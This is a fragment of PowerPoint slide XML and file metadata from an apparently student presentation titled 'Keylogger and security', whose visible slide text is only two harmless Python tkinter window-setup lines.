            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="80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18</TotalTime>
  <Words>1243</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>132</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Keylogger and security</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kings engineering college</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-09T07:28:26Z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